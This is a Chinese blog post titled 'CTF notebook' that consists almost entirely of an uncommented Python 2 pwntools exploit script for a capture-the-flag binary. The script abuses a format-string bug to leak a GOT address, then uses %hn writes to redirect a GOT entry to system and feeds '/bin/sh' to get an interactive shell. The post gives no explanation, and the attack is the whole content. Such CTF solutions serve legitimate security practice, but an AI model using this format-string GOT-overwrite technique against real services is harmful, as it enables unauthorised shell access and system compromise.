CTF notebook

最新推荐文章于 2024-05-19 09:56:32 发布

Azurexuoxi

最新推荐文章于 2024-05-19 09:56:32 发布

阅读量855

点赞数

分类专栏：信息安全文章标签： ctf

信息安全专栏收录该内容

5 篇文章 0 订阅

订阅专栏

    Debug=0  
    Local=1  
    Frida=0  
    Debug_pwntools=1  
     
    #常量
    Local_path='./notebook'
     
    Remote_addr=''
    Port=1
     
    frida_script_path='./frida.js'
     
     
     
    if Local!=0:
      process=process(Local_path)
    else:
      process=remote(Remote_addr,Port)
     
    if Debug_pwntools!=0:
      context.log_level="debug"
     
    if Frida!=0 and Local!=0:
      import frida,sys
     
      def print_result(message):  
                  print "[*] %s" %(message)
      
      def on_message(message, data):  
                  print_result(message['payload'])
      
      
      frida_process = frida.attach(process.pid)
      f = open('frida_script_path')
      jscode = f.read()
      f.close()
      script = frida_process.create_script(jscode)  
      script.on('message', on_message)
     
    if Debug!=0 and Local!=0:
      context.terminal = ['tmux', 'splitw', '-h']
      gdb.attach(process)
     
    if Debug!=0:
      raw_input()
    read_addr=0x0804A02C
    write_addr=0x0804A014
    globallength=0x0804A06C
    process.recv()
    process.send('a'*6+r"%25$s"+'a'*5+p32(read_addr)+p32(globallength)+r"%26$n"+"\n")
    # process.send('a'*6+r"%25$s"+'a'*5+p32(read_addr)+"\n")
     
    # process.send("1\n")
    process.recv(6)
    sys_got=u32(process.recv(4))
    # sys_got = strlen_got - (libc.got['strlen'] - libc.got['system'])
    # free_got = strlen_got - (libc.got['strlen'] - libc.got['free'])
    write_value=sys_got
    # print 'slen:'+hex(strlen_got)
    print 'sys :'+hex(write_value)
    # print 'free:'+hex(free_got)
    process.recv()
    high_value=(write_value/(2**16))
    low_value=(write_value%(2**16))
    print hex(high_value)
    print hex(low_value)
    if high_value>low_value:
      print '先写低位'
      process.send('/bin/sh'+chr(24)+p32(write_addr)+p32(write_addr+2)+r'%'+str(low_value-0x10)+r'x'+r"%23$hn"+r'%'+str(high_value-low_value)+r'x'+r"%24$hn"+"\n")
      # process.send('/bin/sh'+chr(61)+p32(write_addr)+p32(write_addr+2)+r'%'+r'x'+r"%23$hn"+r'%'+r'x'+r"%24$hn"+"\n")
     
    else:
      #先写高位
      process.send('/bin/sh'+chr(24)+p32(write_addr)+p32(write_addr+2)+r'%'+str(high_value-0x10)+r'x'+r"%24$hn"+r'%'+str(low_value-high_value)+r'x'+r"%23$hn"+"\n")
      # process.send('/bin/sh'+chr(61)+p32(write_addr)+p32(write_addr+2)+r'%'+r'x'+r"%24$hn"+r'%'+r'x'+r"%23$hn"+"\n")
     
    if Debug!=0:
      raw_input()
    process.interactive()

Azurexuoxi

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CTF notebook

Debug=0 Local=1 Frida=0 Debug_pwntools=1 #常量 Local_path='./notebook' Remote_addr='' Port=1 frida_script_path='./frida.js' ...
复制链接

扫一扫

专栏目录